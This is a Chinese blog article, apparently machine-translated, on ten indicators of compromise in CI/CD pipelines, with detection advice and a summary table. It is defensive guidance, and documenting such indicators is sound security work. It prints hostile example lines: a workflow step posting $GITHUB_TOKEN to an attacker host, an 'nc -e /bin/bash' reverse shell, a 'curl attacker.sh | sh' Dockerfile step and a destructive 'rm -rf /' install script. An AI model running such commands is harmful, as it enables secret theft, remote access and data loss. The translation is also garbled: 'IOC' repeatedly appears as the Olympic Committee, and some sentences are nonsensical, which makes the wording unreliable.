简介:网络安全中的妥协指标是什么?
妥协指标是第一个警告信号,表明您的系统或 pipeline 可能受到攻击。简而言之, 妥协指标 是攻击者留下的痕迹,比如奇怪的 login文件更改或隐藏的恶意软件。在 国际奥委会网络安全它们就像犯罪现场的指纹一样,能给你明确的证据,证明事情出了问题。因此,当开发人员询问 什么是妥协指标答案不仅限于服务器或防火墙,还包括现代 CI/CD pipelines.
在这些 pipeline攻击者可以篡改代码、注入恶意依赖项或更改构建步骤而不被发现。然而,大多数指南仍然只关注服务器或网络。因此,软件供应链已成为最容易被攻击的目标之一。
这就是为什么在 CI/CD pipelines 至关重要。最重要的是,它可以帮助团队阻止恶意软件、保护机密,并确保软件交付的每一步都安全无虞。
十大妥协指标 CI/CD Pipelines
在解释入侵指标 (IoI) 时,大多数列表都侧重于服务器或网络。然而, CI/CD pipeline攻击者会留下截然不同的指纹。识别这些信号对于主动防御至关重要。以下是每个开发人员和安全工程师都应该注意的 10 个 IOC 网络安全危险信号。
1.可疑的依赖关系变化
妥协的主要指标之一 pipelines 是一个突然的、奇怪的依赖项更新。攻击者经常利用开发人员对包管理器的信任来添加危险的包。
例如,在 npm a package.json diff 可能突然包括:
+ "crypto-helper": "^1.0.2"
这样的改变可能看起来是安全的,但可能会在每个版本中注入木马代码。
影响: 受损版本从源头继承了恶意软件。
检测: 强制执行依赖性审查、跟踪锁文件差异并始终扫描新包。
2. 构建中的混淆代码
恶意软件作者依靠混淆技术来绕过审查。因此,这种妥协指标 CI/CD pipelines 可能是最难捕获的攻击之一。事实上,经过混淆的有效载荷经常会在不被察觉的情况下潜入开源库或容器镜像中。
例如:
- 使用一个 PyPI 包
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - 包含非必要 UPX 二进制文件的 Docker 镜像。
- JavaScript 充满
\x41\x42逃脱隐藏凭证窃取者的追捕。
影响: 隐藏代码在构建或运行时静默执行,这使其成为 IOC 网络安全中的关键信号。
检测: 结合 SAST 使用恶意软件扫描来标记已编码或加壳的代码。最重要的是,将混淆视为危险信号,需要进一步调查。
3. Git 中泄露的秘密:典型的 IOC 网络安全风险
CI/CD pipeline通常直接从存储库继承机密。然而, 当 Git 中出现机密信息时,它们成为“什么是妥协指标”这一问题最明确的答案之一 pipelines?”一旦凭证进入 Git,攻击者就可以无限期地利用它们。
例如:
- A
.env文件包含AWS_SECRET_KEY=. - 已推送代币
config.json. - 即使删除后,秘密仍然在 Git 历史记录中可见。
影响: 暴露的密钥使攻击者能够直接访问 CI/CD pipeline系统、云系统或数据库。因此,这是最危险的入侵指标之一。
检测: 绝大部分储备使用 pre-commit hooks 以及持续集成 (CI) 作业进行秘密扫描,并立即撤销泄露的密钥。此外,强制执行自动修复以减少暴露窗口。
4. 被篡改 Pipeline 配置:隐藏的攻击指标
Pipeline 配置是高价值目标,因为 一次修改往往会劫持整个工作流程。因此,被篡改 pipeline 文件是国际奥委会网络安全的一个主要风险,传统监控工具很少能检测到。
例如:
在 GitHub Actions 中:
- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN- 在 GitLab 中:恶意作业被添加到
.gitlab-ci.yml转储敏感数据。 - 在詹金斯:
sh "nc -e /bin/bash attacker.com 4444".
影响: 这些未经批准的更改会使您 pipeline 成为攻击者的永久后门,这显然是妥协的指标。
检测: 强制执行签名配置,要求 PR 审批,并监控意外作业。此外,设置 guardrails 自动阻止改变的工作流程。
5。 特权 IaC 默认值
错误配置的基础设施定义通常会创建隐藏的后门。因此, IaC 是典型的国际奥委会网络安全风险。
例如:
- Kubernetes 部署授予 Pod
privileged: true. - Helm charts 公开服务
0.0.0.0:22.
影响: 攻击者获得 root 级访问权限或公开内部服务。因此,这些问题大大扩展了攻击面。
检测: 在断裂前, IaC 在合并之前进行扫描以强制执行最低权限。此外,确保每个配置都作为 pipeline.
6. 不寻常的构建行为
攻击者经常改变 pipeline 行为会潜入恶意行为。换句话说,异常的构建活动是针对入侵指标的最清晰答案之一。 CI/CD pipelines.
例如:
- 构建向陌生域发出出站网络请求。
- Node.js 项目在以下情况下突然生成 PowerShell:
npm install. - CI 作业正在下载构建脚本中未定义的大型二进制文件。
影响: 被入侵的版本可能成为恶意软件的传播点。最重要的是,它们会在每个部署中传播恶意负载。
检测: 监控构建日志中是否存在意外的进程或连接。此外,配置异常检测以标记异常行为。
7. 恶意程序包脚本构成 IOC 网络安全风险
包管理器支持生命周期 hooks 攻击者可以利用这些漏洞。因此,npm、PyPI 或 Dockerfiles 中的恶意脚本是被入侵的强烈指标。
例如:
- 节点管理:
postinstall脚本运行rm -rf /或向 C2 发出信标。 - PyPI:
setup.py在安装时执行隐藏的 Python 代码。 - Dockerfile:
RUN curl attacker.sh | sh.
影响: 攻击在安装过程中执行,在任何运行时测试之前。因此,开发人员可能永远不会注意到,直到为时已晚。
检测: 扫描软件包清单中的安装脚本。此外,限制风险 hooks in CI/CD 工作以减少曝光。
8. 注册表中毒危害指标
攻击者替换或修改注册表中的工件,这些事件是供应链中妥协指标的典型例子 pipelines.
例如:
- 使用木马层悄悄更新的 Docker 镜像标签。
- 内部软件包被替换为中毒版本。
- npm 命名空间抢注,例如
lodash-proxy.
影响: 每次使用注册表构件的构建都会受到威胁。不仅如此,这种威胁还会蔓延到下游服务。
检测: 对所有注册表拉取操作强制执行签名和完整性检查。此外,使用以下方式追踪工件来源: SBOM 验证。
9. 异常用户活动作为IOC证据
被盗用的账户几乎总会留下异常痕迹。 因此,开发人员的异常行为是受到攻击的强烈信号。
例如:
- Commit于当地时间凌晨 3 点推送。
- 休假账户的 PR 批准。
- Pipeline以异常频率触发。
影响: 攻击者滥用窃取的凭证来插入恶意更改。毕竟,未经授权 commit可以轻松融入正常的工作流程。
检测: 显示器 SCM 活动异常,执行 MFA,并定期轮换令牌。此外,对可疑活动发出警报 commit 或批准模式。
10. 国际奥委会网络安全中的完整性或签名检查失败
常见但被忽视的一个 妥协指标 完整性或签名检查失败。在IOC网络安全中,这些检查用于验证代码或工件的真实性。跳过这些检查会导致 pipeline暴露了。
例子:
- SHA256 哈希与预期的校验和不匹配。
- GPG 签名缺失或无效。
- An SBOM 显示未签名的文物。
影响: 完整性失败通常意味着篡改、注册表中毒或恶意软件注入。
检测: 自动执行签名检查,强制执行校验和验证,并阻止未签名的组件。最重要的是,将每一次失败的检查都视为入侵的明确证据。
CI/CD 一目了然的攻击指标
| 妥协指标 (IOC) | 影响 CI/CD Pipelines | 如何检测 |
|---|---|---|
| 可疑的依赖项更改 | 攻击者在包管理器中注入恶意库,导致构建受到威胁。 | 跟踪锁文件差异,强制执行依赖性审查,并持续扫描依赖性。 |
| 构建中的混淆代码 | 隐藏的有效载荷在构建或运行时执行而不被检测到。 | 绝大部分储备使用 SAST 并进行恶意软件扫描以标记 base64、hex 或打包代码模式。 |
| Git 中暴露的秘密 | 泄露的令牌或 API 密钥可让攻击者直接访问关键系统。 | 在 Git 中运行秘密扫描 hooks 并自动撤销泄露的凭证。 |
| 篡改 Pipeline 型号 | 修改后的工作流程允许数据泄露或持久化 CI/CD. | 要求 PR 批准、强制执行签名配置并进行监控 pipeline 的变化。 |
| 特权 IaC 默认值 | 过于宽松的角色或不安全的默认设置会暴露云环境。 | 扫描 Terraform、Kubernetes 和 Helm 文件以实施最低权限。 |
| 不寻常的构建行为 | Pipeline用作恶意软件分发点或横向移动。 | 分析构建日志中是否存在意外的下载、进程或出站呼叫。 |
| 恶意包脚本 | 隐藏的安装前/安装后脚本在运行时测试之前触发有效负载。 | 阻止有风险的 npm/PyPI 脚本并限制执行 CI/CD 工作。 |
| 注册表中毒 | 被木马感染的构件会取代注册表中受信任的图像或二进制文件。 | 验证校验和、强制签名验证并主动扫描注册表。 |
| 异常用户活动 | 被盗账户推送恶意 commits 或触发器 pipelines. | 执行 MFA,监控 commits 寻找异常,并分析 login 图案。 |
| 完整性或签名检查失败 | 表示被篡改的代码、依赖项或图像进入 pipeline. | 自动进行完整性检查并阻止未签名或不匹配的组件。 |
国际奥委会传统网络安全为何失败 CI/CD 风险
大多数组织已经监控了服务器、计算机或网络上的入侵指标 (IOC)。然而,这种传统的 IOC 网络安全方法忽略了 CI/CD pipelines,现在是最关键的攻击面之一。事实上, pipeline显示出传统工具无法检测到的独特妥协信号。
传统安全中的妥协指标
在传统的国际奥委会网络安全中,重点通常放在:
- 异常 login或 IP 地址表明凭证被盗。
- 可疑的文件哈希值或注册表更改会揭示恶意软件。
- 指向数据泄露的意外出站流量。
这些是众所周知的指标,也跟踪 MITRE ATT&CK框架,它映射了常见的对手行为和策略。这些都是有用的信号。然而,它们主要适用于操作系统或企业网络。因此,它们会错过软件供应链早期发生的细微篡改。
CI/CD Pipeline不同之处
CI/CD pipeline是自动化环境,开发人员 commit 代码、拉取依赖项并发布构建。攻击者知道,这里的一次入侵会波及到所有部署。因此,在 CI/CD pipelines?它们看起来很不一样:
- 悄悄添加到 package.json 或 requirements.txt 的恶意依赖项。
- Git 中公开的 API 密钥或令牌 commits 或 .env 文件。
- 注入 npm 或 PyPI 包的混淆代码。
- Terraform 或 Kubernetes 文件具有不安全的默认值,例如 privileged: true。
- Pipeline 编辑作业以窃取数据或打开后门。
这些妥协信号 CI/CD 保持不可见 standard 安全工具。
国际奥委会网络安全的漏洞
尽管许多团队了解入侵指标 (IoI) 的价值,但他们仍然仅仅依赖于服务器和网络日志的检测。因此,攻击者可以毒害构建或植入恶意软件,而不会留下任何痕迹。这就是为什么 XZ Utils 后门或恶意 npm 包等事件直到进入生产环境才被发现的原因。
此类供应链妥协也凸显了 CISA的供应链安全指导警告称,攻击者越来越多地瞄准 CI/CD pipeline和注册表。
外卖
传统的国际奥委会网络安全措施固然必要,但还不够。最重要的是,各参赛队必须识别出针对特定情况的入侵指标, CI/CD pipeline只有这样,他们才能检测到恶意代码或 pipeline 防止滥用蔓延到其他环境。
